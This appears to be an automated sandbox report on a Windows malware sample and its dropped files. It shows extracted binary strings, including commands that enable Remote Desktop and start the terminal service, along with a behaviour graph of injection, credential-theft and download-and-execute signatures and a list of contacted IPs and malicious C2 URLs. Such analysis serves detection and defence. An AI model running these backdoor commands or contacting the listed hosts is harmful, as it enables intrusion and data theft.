McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: futors.exe, 0000002A.00000000.1624957449.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: net start termservice
Source: futors.exe, 0000002A.00000000.1624957449.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: futors.exe, 0000002B.00000000.1630541824.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: net start termservice
Source: futors.exe, 0000002B.00000000.1630541824.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: amnew[1].exe.21.dr String found in binary or memory: net start termservice
Source: amnew[1].exe.21.dr String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E61204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00E61204
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E61806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00E61806
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1650509 Sample: Af3hqfTjFh.exe Startdate: 27/03/2025 Architecture: WINDOWS Score: 100 156 Found malware configuration 2->156 158 Antivirus detection for URL or domain 2->158 160 Antivirus detection for dropped file 2->160 162 26 other signatures 2->162 11 rapes.exe 2->11         started        16 Af3hqfTjFh.exe 1 2->16         started        18 futors.exe 2->18         started        20 8 other processes 2->20 process3 dnsIp4 134 176.113.115.6 SELECTELRU Russian Federation 11->134 136 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 11->136 138 107.174.192.179 AS-COLOCROSSINGUS United States 11->138 102 C:\Users\user\AppData\Local\...PTwCQd.exe, PE32+ 11->102 dropped 104 C:\Users\user\AppData\Local\...\7b35p_003.exe, PE32 11->104 dropped 106 C:\Users\user\AppData\...\d6a397c01b.exe, PE32+ 11->106 dropped 116 14 other malicious files 11->116 dropped 234 Contains functionality to start a terminal service 11->234 236 Hides threads from debuggers 11->236 238 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->238 240 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->240 22 466a80d633.exe 11->22         started        26 EPTwCQd.exe 11->26         started        28 apple.exe 11->28         started        36 2 other processes 11->36 108 C:\Users\user\AppData\Local\...\tOEPAwmQl.hta, HTML 16->108 dropped 242 Binary is likely a compiled AutoIt script file 16->242 244 Found API chain indicative of sandbox detection 16->244 246 Creates HTA files 16->246 30 mshta.exe 1 16->30         started        32 cmd.exe 1 16->32         started        140 185.215.113.209 WHOLESALECONNECTIONSNL Portugal 18->140 142 77.90.153.244 RAPIDNET-DEHaunstetterStr19DE Germany 18->142 144 3 other IPs or domains 18->144 110 C:\Users\user\AppData\...\01ea7855d3.exe, PE32 18->110 dropped 112 C:\Users\user\AppData\...\f4d01cf3f8.exe, PE32 18->112 dropped 114 C:\Users\user\AppData\Local\...\please18.exe, PE32 18->114 dropped 118 9 other malicious files 18->118 dropped 146 2 other IPs or domains 20->146 248 Suspicious powershell command line found 20->248 250 Changes security center settings (notifications, updates, antivirus, firewall) 20->250 252 Tries to download and execute files (via powershell) 20->252 34 powershell.exe 16 20->34         started        file5 signatures6 process7 file8 92 C:\Users\user\AppData\...\svchost015.exe, PE32 22->92 dropped 164 Detected unpacking (changes PE section rights) 22->164 166 Tries to detect sandboxes and other dynamic analysis tools (window names) 22->166 168 Writes to foreign memory regions 22->168 188 5 other signatures 22->188 170 Multi AV Scanner detection for dropped file 26->170 172 Allocates memory in foreign processes 26->172 174 Injects a PE file into a foreign processes 26->174 38 MSBuild.exe 26->38         started        42 conhost.exe 26->42         started        94 C:\Users\user\AppData\Local\Temp\ssisd.sys, PE32+ 28->94 dropped 96 C:\Users\user\AppData\Local\Temp\22.exe, PE32 28->96 dropped 176 Sample is not signed and drops a device driver 28->176 44 22.exe 28->44         started        178 Suspicious powershell command line found 30->178 180 Tries to download and execute files (via powershell) 30->180 46 powershell.exe 15 19 30->46         started        182 Uses schtasks.exe or at.exe to add and modify task schedules 32->182 49 schtasks.exe 1 32->49         started        51 conhost.exe 32->51         started        53 Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE 34->53         started        55 conhost.exe 34->55         started        98 C:\Users\user\AppData\Local\...\futors.exe, PE32 36->98 dropped 184 Antivirus detection for dropped file 36->184 186 Contains functionality to start a terminal service 36->186 57 3 other processes 36->57 signatures9 process10 dnsIp11 126 172.64.80.1 CLOUDFLARENETUS United States 38->126 190 Attempt to bypass Chrome Application-Bound Encryption 38->190 192 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 38->192 194 Query firmware table information (likely to detect VMs) 38->194 212 2 other signatures 38->212 196 Multi AV Scanner detection for dropped file 44->196 198 Detected unpacking (overwrites its own PE header) 44->198 59 cmd.exe 44->59         started        128 176.113.115.7 SELECTELRU Russian Federation 46->128 120 Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, PE32 46->120 dropped 200 Powershell drops PE file 46->200 62 Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE 4 46->62         started        65 conhost.exe 46->65         started        202 Suspicious powershell command line found 49->202 204 Tries to download and execute files (via powershell) 49->204 206 Contains functionality to start a terminal service 53->206 208 Hides threads from debuggers 53->208 214 2 other signatures 53->214 130 149.154.167.99 TELEGRAMRU United Kingdom 57->130 132 88.99.125.82 HETZNER-ASDE Germany 57->132 210 Tries to harvest and steal browser information (history, passwords, etc) 57->210 67 chrome.exe 57->67         started        file12 signatures13 process14 dnsIp15 216 Uses cmd line tools excessively to alter registry or file data 59->216 70 22.exe 59->70         started        73 conhost.exe 59->73         started        122 C:\Users\user\AppData\Local\...\rapes.exe, PE32 62->122 dropped 218 Antivirus detection for dropped file 62->218 220 Detected unpacking (changes PE section rights) 62->220 222 Contains functionality to start a terminal service 62->222 224 5 other signatures 62->224 75 rapes.exe 62->75         started        124 192.168.2.9 unknown unknown 67->124 78 chrome.exe 67->78         started        file16 signatures17 process18 dnsIp19 100 C:\Users\user\AppData\Local\Temp\...\504E.bat, ASCII 70->100 dropped 81 cmd.exe 70->81         started        226 Detected unpacking (changes PE section rights) 75->226 228 Contains functionality to start a terminal service 75->228 230 Tries to evade debugger and weak emulator (self modifying code) 75->230 232 3 other signatures 75->232 148 142.250.176.195 GOOGLEUS United States 78->148 150 142.250.65.170 GOOGLEUS United States 78->150 152 7 other IPs or domains 78->152 file20 signatures21 process22 signatures23 154 Uses cmd line tools excessively to alter registry or file data 81->154 84 conhost.exe 81->84         started        86 sc.exe 81->86         started        88 sc.exe 81->88         started        90 11 other processes 81->90 process24
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.65.170
 unknown United States
15169 GOOGLEUS false
176.113.115.7
 unknown Russian Federation
49505 SELECTELRU true
1.1.1.1
 unknown Australia
13335 CLOUDFLARENETUS false
140.82.112.4
 unknown United States
36459 GITHUBUS false
23.204.23.20
 unknown United States
16625 AKAMAI-ASUS false
176.113.115.6
 unknown Russian Federation
49505 SELECTELRU true
107.174.192.179
 unknown United States
36352 AS-COLOCROSSINGUS false
172.253.63.84
 unknown United States
15169 GOOGLEUS false
185.7.214.51
 unknown France
42652 DELUNETDE false
142.251.40.206
 unknown United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
149.154.167.99
 unknown United Kingdom
62041 TELEGRAMRU false
142.250.80.99
 unknown United States
15169 GOOGLEUS false
142.250.81.228
 unknown United States
15169 GOOGLEUS false
142.251.40.142
 unknown United States
15169 GOOGLEUS false
142.251.32.110
 unknown United States
15169 GOOGLEUS false
185.215.113.209
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
185.199.109.133
 unknown Netherlands
54113 FASTLYUS false
172.64.80.1
 unknown United States
13335 CLOUDFLARENETUS false
142.250.176.195
 unknown United States
15169 GOOGLEUS false
88.99.125.82
 unknown Germany
24940 HETZNER-ASDE false
77.90.153.244
 unknown Germany
42821 RAPIDNET-DEHaunstetterStr19DE false

Private

IP
192.168.2.9
127.0.0.1

Contacted URLs

Name Malicious Antivirus Detection Reputation
weldorae.digital/geds true
  • Avira URL Cloud: malware
 unknown
smeltingt.run/giiaus true
  • Avira URL Cloud: malware
 unknown
targett.top/dsANGt false
    		high
    scenarisacri.top/gHSAYuqo true
    • Avira URL Cloud: malware
    		 unknown
    ferromny.digital/gwpd true
    • Avira URL Cloud: malware
    		 unknown